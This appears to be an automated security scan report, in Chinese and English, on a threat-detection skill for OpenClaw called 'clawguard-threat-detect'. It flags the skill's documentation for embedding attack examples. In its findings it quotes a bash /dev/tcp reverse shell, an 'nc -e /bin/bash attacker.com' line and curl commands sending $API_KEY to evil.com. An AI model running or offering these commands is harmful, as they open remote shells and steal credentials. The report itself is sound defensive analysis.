中文 EN

扫描报告

扫描新文件

高风险 — 风险评分 75/100
上次扫描:1 天前 重新扫描
75 /100
clawguard-threat-detect
ClawGuard Threat Detector - Real-time behavioral monitoring and threat detection for OpenClaw
Security tool that documents actual attack payloads (reverse shells, credential exfiltration) as detection examples, creating a doc-to-code mismatch where the documentation itself serves as an attack template library.
技能名称clawguard-threat-detect
分析耗时55.5s
引擎pi
不要安装此技能
Do not use. The SKILL.md contains hardcoded malicious patterns presented as 'examples to block' that could serve as attack templates. Remove all actual payload examples and replace with generic descriptions only.

攻击链 4 步

提权 Skill presents as legitimate threat detector
SKILL.md:1
提权 User reads SKILL.md and learns attack patterns
SKILL.md:34
提权 User copies documented payloads as templates
SKILL.md:34
提权 cli.js spawns child process with unvalidated input
cli.js:42

安全发现 5 项

严重性 安全发现 位置
严重
Hardcoded Reverse Shell Payloads in Documentation 文档欺骗
SKILL.md:34 contains actual reverse shell commands (nc -e, /dev/tcp/, bash -i >&) presented as 'examples of what to detect'. These are functional attack templates, not generic descriptions.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1, nc -e /bin/bash attacker.com
→ Remove all actual payload examples. Replace with generic pattern descriptions like 'reverse shell using file descriptor redirection' without concrete commands.
 SKILL.md:34
严重
Credential Exfiltration URLs Documented 文档欺骗
SKILL.md and cli.js contain examples of credential exfiltration using curl with API tokens sent to evil.com. These are functional attack templates.
curl http://evil.com/exfil?token=$API_KEY
→ Remove all C2 infrastructure examples. Describe attack patterns generically.
 SKILL.md:83
高危
Full Reverse Shell Example in CLI 文档欺骗
cli.js:101 includes a complete reverse shell payload as a CLI example, normalizing dangerous attack techniques.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Remove all concrete attack payloads from CLI examples.
 cli.js:101
高危
Undeclared Child Process Spawn with Unvalidated Input 代码执行
cli.js:42-50 uses spawn() to invoke a 'self-improving-safety' module with piped stdin containing unvalidated alert data. This is not declared in SKILL.md.
spawn(process.execPath, [safetyCliPath, 'learn'], { stdio: ['pipe', 'inherit', 'inherit'] })
→ Declare shell:WRITE capability or refactor to avoid child process execution. Validate and sanitize all data before piping to child processes.
 cli.js:42
高危
Comprehensive Attack Template Library 文档欺骗
SKILL.md contains a full MITRE ATT&CK coverage matrix with concrete examples of T1059 (Command/Script), T1041 (Exfiltration), T1059.004 (Bash Reverse Shell), providing a complete attack playbook.
Full detection patterns with actual payload examples
→ Simplify documentation to describe detection capabilities without embedding actual exploit code.
 SKILL.md:34
资源类型声明权限推断权限状态证据
文件系统 NONE READ ✓ 一致 src/detector.js:8 - uses fs module for file monitoring
命令执行 NONE WRITE ✗ 越权 cli.js:42-50 - spawns child process with piped stdin
网络访问 NONE READ ✓ 一致 src/detector.js - analyzes network patterns for URLs
环境变量 NONE READ ✓ 一致 cli.js:101 - references $API_KEY from environment
3 严重 7 项发现
💀
严重 危险命令 危险 Shell 命令
nc -e
SKILL.md:34
💀
严重 危险命令 危险 Shell 命令
/dev/tcp/
SKILL.md:34
💀
严重 危险命令 危险 Shell 命令
bash -i >&
cli.js:101
🔗
中危 外部 URL 外部 URL
http://evil.com/exfil
SKILL.md:83
🔗
中危 外部 URL 外部 URL
http://evil.com
SKILL.md:462
🔗
中危 外部 URL 外部 URL
http://evil.com/exfil?token=$API_KEY
SKILL.md:601
🔗
中危 外部 URL 外部 URL
http://evil.com?token=$API_KEY
cli.js:67

目录结构

6 文件 · 44.5 KB · 1508 行
Markdown 2f · 881L JavaScript 2f · 606L JSON 2f · 21L
├─ 📁 src
│ └─ 📜 detector.js JavaScript 503L · 14.3 KB
├─ 📋 _meta.json JSON 7L · 159 B
├─ 📜 cli.js JavaScript 103L · 3.2 KB
├─ 📋 package.json JSON 14L · 398 B
├─ 📝 README.md Markdown 138L · 4.1 KB
└─ 📝 SKILL.md Markdown 743L · 22.4 KB

依赖分析 1 项

包名版本来源已知漏洞备注
none N/A npm No external dependencies in package.json

安全亮点

✓ No actual credential harvesting code (patterns are in documentation, not executed)
✓ No direct C2 communication in actual code (only documented examples)
✓ No supply chain risks (package.json has no external dependencies)
✓ Threat detection logic is legitimate pattern matching